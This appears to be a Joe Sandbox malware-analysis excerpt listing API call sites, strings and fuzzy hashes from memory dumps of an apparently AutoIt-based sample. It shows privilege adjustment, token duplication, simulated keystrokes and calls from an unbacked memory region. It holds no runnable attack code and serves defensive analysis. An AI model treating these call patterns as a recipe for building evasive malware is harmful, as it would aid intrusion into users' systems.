                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: 5a4caf6bff90bfa58026d521faf872804f218582274bc7df1a4813948ba13e92
                                                      • Instruction ID: 2765e7f716ff0ec49a52a7cde6fe11c4155e538434d12a8ad6a9ed247efe775c
                                                      • Opcode Fuzzy Hash: 5a4caf6bff90bfa58026d521faf872804f218582274bc7df1a4813948ba13e92
                                                      • Instruction Fuzzy Hash: CE110631600B05DFD730CF25C888B66B7F9EF45760F14C92EE5AA8AA90D7B1E945CB60
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: _wcscmp
                                                      • String ID:
                                                      • API String ID: 856254489-0
                                                      • Opcode ID: 5a7d7a3af063aa8dff0968238defc7fb39dd86b7b2dde550ccc449ee86ca5d26
                                                      • Instruction ID: 9ed38578e66f76a75cb06962bd366e3159de3bb29d7faa65ee133684c45fee31
                                                      • Opcode Fuzzy Hash: 5a7d7a3af063aa8dff0968238defc7fb39dd86b7b2dde550ccc449ee86ca5d26
                                                      • Instruction Fuzzy Hash: 0001F972D082555FDB169B2888516AEFF749F57320F19809BD890EB1A1D2309D42CF91
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID:
                                                      • API String ID: 4104443479-0
                                                      • Opcode ID: 327c95574f60e5010daba2857bec39af6c2e223ed2d997c94b99b88fa264bf6e
                                                      • Instruction ID: 84c79580d006aae36979cd62e1561e365aa9ad146f94cfd9d4cbda7b5f55772c
                                                      • Opcode Fuzzy Hash: 327c95574f60e5010daba2857bec39af6c2e223ed2d997c94b99b88fa264bf6e
                                                      • Instruction Fuzzy Hash: 0E018475600541AFC305EB69C941D26F7B9FF953507148159F815C7702DB30EC21CBE0
                                                      APIs
                                                      • __lock_file.LIBCMT ref: 00A84AD6
                                                        • Part of subcall function 00A88D68: __getptd_noexit.LIBCMT ref: 00A88D68
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: __getptd_noexit__lock_file
                                                      • String ID:
                                                      • API String ID: 2597487223-0
                                                      • Opcode ID: dda4bf41ada0723c3bcfa7672f0f2842e928ec04d02bec33fc134e2bc2c03b6b
                                                      • Instruction ID: 691f58f958fddc53f915052c1c46c1667e433186a6dec80e073be64a2671f56d
                                                      • Opcode Fuzzy Hash: dda4bf41ada0723c3bcfa7672f0f2842e928ec04d02bec33fc134e2bc2c03b6b
                                                      • Instruction Fuzzy Hash: 5BF0AF3194020AABDF61BF648D0679FBAA1AF04365F448514F424AA1D1DF788A50DF51
                                                      APIs
                                                      • FreeLibrary.KERNEL32(?,?,00B262F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00A64FDE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: FreeLibrary
                                                      • String ID:
                                                      • API String ID: 3664257935-0
                                                      • Opcode ID: a4784345c165452e4a505fbaa03559ee1a429afa5794ef9022bf6371c8f4985a
                                                      • Instruction ID: 3c023aa2b8ff35e5cafa666302d33b68f78003d374bce78e73cad7d378ec0680
                                                      • Opcode Fuzzy Hash: a4784345c165452e4a505fbaa03559ee1a429afa5794ef9022bf6371c8f4985a
                                                      • Instruction Fuzzy Hash: 30F03971509B12CFCB349F64E494812BBF1BF087293208A7EE5D682610C771A840DF40
                                                      APIs
                                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00A809F4
                                                        • Part of subcall function 00A67D2C: _memmove.LIBCMT ref: 00A67D66
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: LongNamePath_memmove
                                                      • String ID:
                                                      • API String ID: 2514874351-0
                                                      • Opcode ID: 34cfa31e5b087328c7609371c923ea353baeec0f54e6b17b2e65c4e01c59f6ec
                                                      • Instruction ID: 68576f0facb7d84992ce30ef2e94093017dc8270a36c1935b12c247a63f3afb6
                                                      • Opcode Fuzzy Hash: 34cfa31e5b087328c7609371c923ea353baeec0f54e6b17b2e65c4e01c59f6ec
                                                      • Instruction Fuzzy Hash: 68E0CD36A042285BC720D6989C05FFA77EDDF88790F0401B5FD0CD7204E9609C818690
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: __fread_nolock
                                                      • String ID:
                                                      • API String ID: 2638373210-0
                                                      • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                                      • Instruction ID: aaf15684a50c6e00bf82a2d8cf98bc277051f8f37ffd3589358b1fb403f67f83
                                                      • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                                      • Instruction Fuzzy Hash: 3DE09AB0604B009FEB788B28D815BE373E0BB06315F04091DF6EA83342EB62B8418B59
                                                      APIs
                                                      • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,00A9E16B,?,?,00000000), ref: 00A65DBF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: FilePointer
                                                      • String ID:
                                                      • API String ID: 973152223-0
                                                      • Opcode ID: d071b5b169c1ca475ff7796f2bccb4c33ac213cbe6341001d2dd0404d5a7fbd8
                                                      • Instruction ID: 824b45cbb4fdab9f6964fc40ec031bcea8c063255bb62e49b862ad4756f100f9
                                                      • Opcode Fuzzy Hash: d071b5b169c1ca475ff7796f2bccb4c33ac213cbe6341001d2dd0404d5a7fbd8
                                                      • Instruction Fuzzy Hash: 58D0C77464020CBFE710DB80DC46FA9777CD745711F100294FE0456290D6B27E508795
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: __wfsopen
                                                      • String ID:
                                                      • API String ID: 197181222-0
                                                      • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                      • Instruction ID: 73f6149758e80a5c198c126929bcdafc58b6a96266978ae9aadcbc9b4e4cb857
                                                      • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                      • Instruction Fuzzy Hash: 2CB0927684020C77DF022E92EC02A593B1A9B40678F808020FF0C18162A673E6A09689
                                                      APIs
                                                      • GetLastError.KERNEL32(00000002,00000000), ref: 00ACD46A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast
                                                      • String ID:
                                                      • API String ID: 1452528299-0
                                                      • Opcode ID: 0642d94ba85e5d6c8f8d0b5401ff3e6d0ee52b91ad32828f855e11f5814f9ba2
                                                      • Instruction ID: a8da8e7ddf9666cfaabba524f40a1668b7b71a0a075c90bd0ca5fc16f3468ebf
                                                      • Opcode Fuzzy Hash: 0642d94ba85e5d6c8f8d0b5401ff3e6d0ee52b91ad32828f855e11f5814f9ba2
                                                      • Instruction Fuzzy Hash: BB716D306083018FC714EF64C691F6AB7F4AF98354F05496DF9969B2A2DB30ED49CB52
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                      • Instruction ID: 1d5be5228eec2586ba2f7d8b2e3181c96596543a95ff1134eb710642871b818b
                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                      • Instruction Fuzzy Hash: 7131C471A00105DFC7A8EF58D48096AF7B6FF59300B648AA5E409CB651D731EDC5CBC0
                                                      APIs
                                                      • Sleep.KERNELBASE(000001F4), ref: 03D82311
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1399187842.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3d80000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID:
                                                      • API String ID: 3472027048-0
                                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                      • Instruction ID: dfe2d2be701a7f5a8b4c1b9c9cf819e83af25732fd0d5c0db6b5d55527bec69b
                                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                      • Instruction Fuzzy Hash: F2E0E67494010DDFDB00EFB8D54969E7FF4EF04302F1005A5FD01D2280D6309D508A62
                                                      APIs
                                                        • Part of subcall function 00A62612: GetWindowLongW.USER32(?,000000EB), ref: 00A62623
                                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00AECE50
                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00AECE91
                                                      • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00AECED6
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00AECF00
                                                      • SendMessageW.USER32 ref: 00AECF29
                                                      • _wcsncpy.LIBCMT ref: 00AECFA1
                                                      • GetKeyState.USER32(00000011), ref: 00AECFC2
                                                      • GetKeyState.USER32(00000009), ref: 00AECFCF
                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00AECFE5
                                                      • GetKeyState.USER32(00000010), ref: 00AECFEF
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00AED018
                                                      • SendMessageW.USER32 ref: 00AED03F
                                                      • SendMessageW.USER32(?,00001030,?,00AEB602), ref: 00AED145
                                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00AED15B
                                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00AED16E
                                                      • SetCapture.USER32(?), ref: 00AED177
                                                      • ClientToScreen.USER32(?,?), ref: 00AED1DC
                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00AED1E9
                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00AED203
                                                      • ReleaseCapture.USER32 ref: 00AED20E
                                                      • GetCursorPos.USER32(?), ref: 00AED248
                                                      • ScreenToClient.USER32(?,?), ref: 00AED255
                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00AED2B1
                                                      • SendMessageW.USER32 ref: 00AED2DF
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00AED31C
                                                      • SendMessageW.USER32 ref: 00AED34B
                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00AED36C
                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00AED37B
                                                      • GetCursorPos.USER32(?), ref: 00AED39B
                                                      • ScreenToClient.USER32(?,?), ref: 00AED3A8
                                                      • GetParent.USER32(?), ref: 00AED3C8
                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00AED431
                                                      • SendMessageW.USER32 ref: 00AED462
                                                      • ClientToScreen.USER32(?,?), ref: 00AED4C0
                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00AED4F0
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00AED51A
                                                      • SendMessageW.USER32 ref: 00AED53D
                                                      • ClientToScreen.USER32(?,?), ref: 00AED58F
                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00AED5C3
                                                        • Part of subcall function 00A625DB: GetWindowLongW.USER32(?,000000EB), ref: 00A625EC
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00AED65F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                      • String ID: @GUI_DRAGID$F
                                                      • API String ID: 3977979337-4164748364
                                                      • Opcode ID: a8a56736aa85869e6b9044fc7b02911c651e9310f1b74afbee2c30a04a4a074c
                                                      • Instruction ID: 9d1a8080ca2cf36dbffa818286f1582130f3eadf2dce7553458ab301d68cb678
                                                      • Opcode Fuzzy Hash: a8a56736aa85869e6b9044fc7b02911c651e9310f1b74afbee2c30a04a4a074c
                                                      • Instruction Fuzzy Hash: 1A429D302043C1AFD725CF69C888FAABBE5FF48324F14052DF6959B2A1D7319952CB92
                                                      APIs
                                                      • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00AE873F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: %d/%02d/%02d
                                                      • API String ID: 3850602802-328681919
                                                      • Opcode ID: 4d4d677b64a21773104f43bceebba17fa1fa7cfd79dcb8e3579f8e0d4f2a1ac2
                                                      • Instruction ID: c897e6d8859252a6be819f6d306520ec5bd2581f093550ea4e6616a82bbf3774
                                                      • Opcode Fuzzy Hash: 4d4d677b64a21773104f43bceebba17fa1fa7cfd79dcb8e3579f8e0d4f2a1ac2
                                                      • Instruction Fuzzy Hash: A412C371500284AFEB259F65CC89FAF7BB8EF45710F244169F919EA2E1DF788941CB10
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: _memmove$_memset
                                                      • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                      • API String ID: 1357608183-1798697756
                                                      • Opcode ID: cf8f6579a3fc74993d7edad4e731a25193369b1ea1b862674e02aabff00f77e9
                                                      • Instruction ID: 84bd27c7b740550947999f913b0202eb92d86c0bd144ef7fbb413b95da8728fe
                                                      • Opcode Fuzzy Hash: cf8f6579a3fc74993d7edad4e731a25193369b1ea1b862674e02aabff00f77e9
                                                      • Instruction Fuzzy Hash: 1B938071A00215DFDF24CF98C891BEDB7B5FF48710F25816AE959AB282E7749E81CB40
                                                      APIs
                                                      • GetForegroundWindow.USER32(00000000,?), ref: 00A64A3D
                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A9DA8E
                                                      • IsIconic.USER32(?), ref: 00A9DA97
                                                      • ShowWindow.USER32(?,00000009), ref: 00A9DAA4
                                                      • SetForegroundWindow.USER32(?), ref: 00A9DAAE
                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00A9DAC4
                                                      • GetCurrentThreadId.KERNEL32 ref: 00A9DACB
                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00A9DAD7
                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00A9DAE8
                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00A9DAF0
                                                      • AttachThreadInput.USER32(00000000,?,00000001), ref: 00A9DAF8
                                                      • SetForegroundWindow.USER32(?), ref: 00A9DAFB
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A9DB10
                                                      • keybd_event.USER32(00000012,00000000), ref: 00A9DB1B
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A9DB25
                                                      • keybd_event.USER32(00000012,00000000), ref: 00A9DB2A
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A9DB33
                                                      • keybd_event.USER32(00000012,00000000), ref: 00A9DB38
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A9DB42
                                                      • keybd_event.USER32(00000012,00000000), ref: 00A9DB47
                                                      • SetForegroundWindow.USER32(?), ref: 00A9DB4A
                                                      • AttachThreadInput.USER32(?,?,00000000), ref: 00A9DB71
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                      • String ID: Shell_TrayWnd
                                                      • API String ID: 4125248594-2988720461
                                                      • Opcode ID: 050f8384e5a3115feee2f476174c8476c93e89cbd24e6387c077d3b105c42b92
                                                      • Instruction ID: 9d961e568ab7c6e1821f29e3dddb54210a2f86e14bd75975477bf903cf7ec039
                                                      • Opcode Fuzzy Hash: 050f8384e5a3115feee2f476174c8476c93e89cbd24e6387c077d3b105c42b92
                                                      • Instruction Fuzzy Hash: 8E317571B40358BFEF20AFA19C89F7F3EACEB54B90F114025FA04EA1D0C6715951ABA0
                                                      APIs
                                                        • Part of subcall function 00AB8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AB8D0D
                                                        • Part of subcall function 00AB8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AB8D3A
                                                        • Part of subcall function 00AB8CC3: GetLastError.KERNEL32 ref: 00AB8D47
                                                      • _memset.LIBCMT ref: 00AB889B
                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00AB88ED
                                                      • CloseHandle.KERNEL32(?), ref: 00AB88FE
                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00AB8915
                                                      • GetProcessWindowStation.USER32 ref: 00AB892E
                                                      • SetProcessWindowStation.USER32(00000000), ref: 00AB8938
                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00AB8952
                                                        • Part of subcall function 00AB8713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00AB8851), ref: 00AB8728
                                                        • Part of subcall function 00AB8713: CloseHandle.KERNEL32(?,?,00AB8851), ref: 00AB873A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
